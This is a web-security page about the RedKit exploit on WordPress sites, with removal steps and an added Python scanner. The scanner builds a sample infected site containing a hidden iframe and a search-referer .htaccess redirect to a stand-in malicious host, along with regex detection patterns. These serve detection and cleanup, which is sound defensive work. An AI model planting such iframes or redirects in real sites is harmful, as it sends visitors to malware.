Redkit Exploit – WordPress and other CMS

If you are here on this page, you might be a WordPress or other Content Management System (CMS) user whose site has been hacked and infected by the RedKit Exploit. You are not alone: tens of thousands of websites are hacked every day. Here is what this exploit does and the best options for finding and resolving it.

  1. How it hacks your site: It is a script sent out looking for vulnerabilities in older versions of Content Management Systems and the modules/plugins they use. The most commonly affected CMS is WordPress. The RedKit Exploit does the following:
    1. Edits your .htaccess file and inserts iframe code into files, which causes a redirect
    2. May insert a default.php file which contains malicious code
  2. What happens after your website is infected: This is one of the more annoying aspects, as the code is a Google redirect. Here is what happens:
    1. Someone searches for your website on Google
    2. They find it and click on the result
    3. Instead of being taken to your website, they are taken to a malicious website which tries to infect their computer
  3. Why this is so damaging:
    1. Your visitors get redirected to a place where they could have sensitive data stolen or their computer infected with some other virus
    2. Google lists your site as “this website may be harmful to your computer”, so no one is going to click on it
  4. Removal: Removing the hack is challenging.
    1. First you must find all inserted iframe code and remove it (including from your .htaccess file).
    2. Hopefully you have a clean backed-up version; otherwise that job is painstaking
    3. Next you must install an updated or new version of WordPress into a new folder (let’s call it public_html_new for now). Install and UPGRADE all of your plugins and DELETE AND REMOVE any plugins you don’t use (even if they are inactive).
    4. Search the old directory for files that don’t belong there and remove them
    5. Once you are sure all needed files are available and clean, zip the original public_html folder and download it. Then DELETE IT from the server and rename public_html_new to public_html
  5. Protecting it from happening again: There is never any surefire way to make sure you don’t get hacked; however, implementing security plugins, making sure your admin account is well protected, and keeping up with upgrades will help.
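Removal steps 1 and 4 above (find the injected iframe and .htaccess code, then find files that do not belong in the old directory) are the part most people get wrong by hand. The script below is an added example, not code from the original page or from any WordPress tool: it scans a web root for hidden iframes in PHP/HTML/JS files and for .htaccess rules that redirect only visitors arriving from a search engine (the usual way a Google-only redirect is built, assumed here rather than stated on the page), and it lists files present in the old public_html that a fresh public_html_new install does not contain. The sample site it builds in a temp directory, the malicious.example hostname and the regex signatures are all constructed for this example and will need tuning for a real site.

```python
import os
import re
import tempfile

# Signatures for the two kinds of tampering the page describes. These are
# constructed for this example and will need tuning for a real site.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(display\s*:\s*none|visibility\s*:\s*hidden|width\s*=\s*[\"']?0|height\s*=\s*[\"']?0)",
    re.IGNORECASE,
)
REFERER_COND = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}.*(google|bing|yahoo)", re.IGNORECASE)
EXTERNAL_REWRITE = re.compile(r"RewriteRule\s+\S+\s+https?://", re.IGNORECASE)
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js"}


def _read(path):
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def find_injected_content(root):
    """Return sorted (relative_path, reason) pairs for files that look tampered with."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            text = _read(path)
            if name == ".htaccess":
                if REFERER_COND.search(text):
                    hits.append((rel, "referer-conditional rewrite"))
                if EXTERNAL_REWRITE.search(text):
                    hits.append((rel, "rewrite to external URL"))
            elif os.path.splitext(name)[1].lower() in SCAN_EXTENSIONS:
                if HIDDEN_IFRAME.search(text):
                    hits.append((rel, "hidden iframe"))
    return sorted(hits)


def extra_files(suspect_root, reference_root):
    """Relative paths present under the old (suspect) tree but absent from a clean install."""
    def listing(root):
        return {
            os.path.relpath(os.path.join(d, f), root)
            for d, _dirs, files in os.walk(root)
            for f in files
        }
    return sorted(listing(suspect_root) - listing(reference_root))


# Standard WordPress rewrite block (clean).
CLEAN_HTACCESS = """RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""
# Constructed infected variant: redirects only visitors arriving from a search engine.
INFECTED_HTACCESS = CLEAN_HTACCESS + """RewriteCond %{HTTP_REFERER} (google|yahoo|bing) [NC]
RewriteRule .* http://malicious.example/ [R=302,L]
"""
# Constructed hidden iframe of the kind injected into page files.
INJECTED_IFRAME = '<iframe src="http://malicious.example/in.php" width="0" height="0" style="display:none"></iframe>\n'


def _write(root, rel, content):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)


def build_sample_site(base):
    """Constructed sample: a clean reference install and an infected copy of it.

    Returns (reference_root, suspect_root)."""
    ref = os.path.join(base, "public_html_new")
    sus = os.path.join(base, "public_html")
    for root in (ref, sus):
        _write(root, "index.php", "<?php echo 'hello'; ?>\n")
        _write(root, ".htaccess", CLEAN_HTACCESS)
        _write(root, os.path.join("wp-content", "plugins", "hello.php"), "<?php // plugin ?>\n")
    # Tamper with the suspect copy the way the page describes.
    _write(sus, "index.php", INJECTED_IFRAME + "<?php echo 'hello'; ?>\n")
    _write(sus, ".htaccess", INFECTED_HTACCESS)
    _write(sus, "default.php", "<?php /* constructed stand-in for a dropped file */ ?>\n")
    return ref, sus


def run_demo():
    """Build the sample site in a temp dir and return the scan results."""
    base = tempfile.mkdtemp(prefix="redkit-scan-")
    ref, sus = build_sample_site(base)
    return {
        "suspect_hits": find_injected_content(sus),
        "reference_hits": find_injected_content(ref),
        "extra": extra_files(sus, ref),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

On a real server you would point find_injected_content at the old public_html and extra_files at the old tree and the fresh public_html_new install; anything it reports still needs a human look, since legitimate themes also use iframes and some plugins ship their own .htaccess rules. The file comparison only catches added files, not modified ones, which is why step 1 (hunting the injected code itself) is still required.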


We can help you with services for cleaning and removing your hack and assist you with protecting your website. If you would like assistance with this, please contact us.